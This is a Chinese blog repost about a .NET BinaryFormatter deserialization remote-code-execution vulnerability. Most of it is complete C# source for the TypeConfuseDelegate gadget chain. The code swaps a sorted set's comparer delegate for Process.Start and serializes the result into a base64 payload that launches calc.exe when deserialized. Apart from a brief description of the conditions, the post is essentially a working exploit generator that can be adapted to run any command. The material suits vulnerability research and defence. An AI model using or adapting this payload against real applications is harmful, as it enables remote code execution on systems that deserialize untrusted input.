1. 首页
  2. 文章中心
  3. c#

.Net反序列化漏洞之BinaryFormatter

96 阅读 0 评论
我是靠谱客的博主 高挑大米,最近开发中收集的这篇文章主要介绍.Net反序列化漏洞之BinaryFormatter,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html

.Net反序列化导致RCE的样例,有两点限制:

  1. BinaryFormatter::Deserialize反序列化的内容用户可控
  2. .Net SDK大于等于4.5
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Threading.Tasks;

namespace Deserializer
{
    class Program
    {
        public static void getCalcPayload()
        {
            // Create a simple multicast delegate
            Delegate d = new Comparison<string>(String.Compare);
            Comparison<string> d2 = (Comparison<string>)MulticastDelegate.Combine(d, d);

            // Create set with original comparer
            IComparer<string> comp = Comparer<string>.Create(d2);
            SortedSet<string> set = new SortedSet<string>(comp);

            set.Add("calc");
            set.Add("adummy");

            TypeConfuseDelegate(d2);

            BinaryFormatter formatter = new BinaryFormatter
            {
                AssemblyFormat = FormatterAssemblyStyle.Simple
            };

            using (MemoryStream stream = new MemoryStream())
            {
                formatter.Serialize(stream, set);
                int position = (int)stream.Position;
                byte[] array = stream.GetBuffer();

                Array.Resize<byte>(ref array, position);

                String payload = Convert.ToBase64String(array);
                Console.WriteLine("Calc.exe PayLoad:" + payload);

                //FileSystemUtils.Pullfile(payload, "payload_calc.dat");

                stream.Position = 0;
                formatter.Deserialize(stream);
            }
        }

        static void TypeConfuseDelegate(Comparison<string> comp)
        {
            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
                                    System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance);

            object[] invoke_list = comp.GetInvocationList();

            // Modify the invocation list to add Process::Start(string, string)
            invoke_list[1] = new Func<string, string, Process>(Process.Start);
            fi.SetValue(comp, invoke_list);

        }

        static void Main(string[] args)
        {
            getCalcPayload();
        }
    }

}

.Net反序列化漏洞之BinaryFormatter

转载于:https://blog.51cto.com/duallay/2045127

最后

以上就是高挑大米为你收集整理的.Net反序列化漏洞之BinaryFormatter的全部内容,希望文章能够帮你解决.Net反序列化漏洞之BinaryFormatter所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(64)

相关文章

[笔记]-mockito对于多层泛型嵌套对象的mock方案
[笔记]-mockito对于多层泛型嵌套对象的mock方案
HITCON 2015 BabyFirst(命令执行绕正则)
HITCON 2015 BabyFirst(命令执行绕正则)
2018 HITCON Crypto lost key
2018 HITCON Crypto lost key
今天开始重新学习asp
今天开始重新学习asp
.Net反序列化漏洞之BinaryFormatter
.Net反序列化漏洞之BinaryFormatter
详细分析.net 反序题目
详细分析.net 反序题目
记一个可以查Serials的网站
记一个可以查Serials的网站
Hitcon2015 babyfirst复现
Hitcon2015 babyfirst复现

评论列表共有 0 条评论

立即
投稿
返回
顶部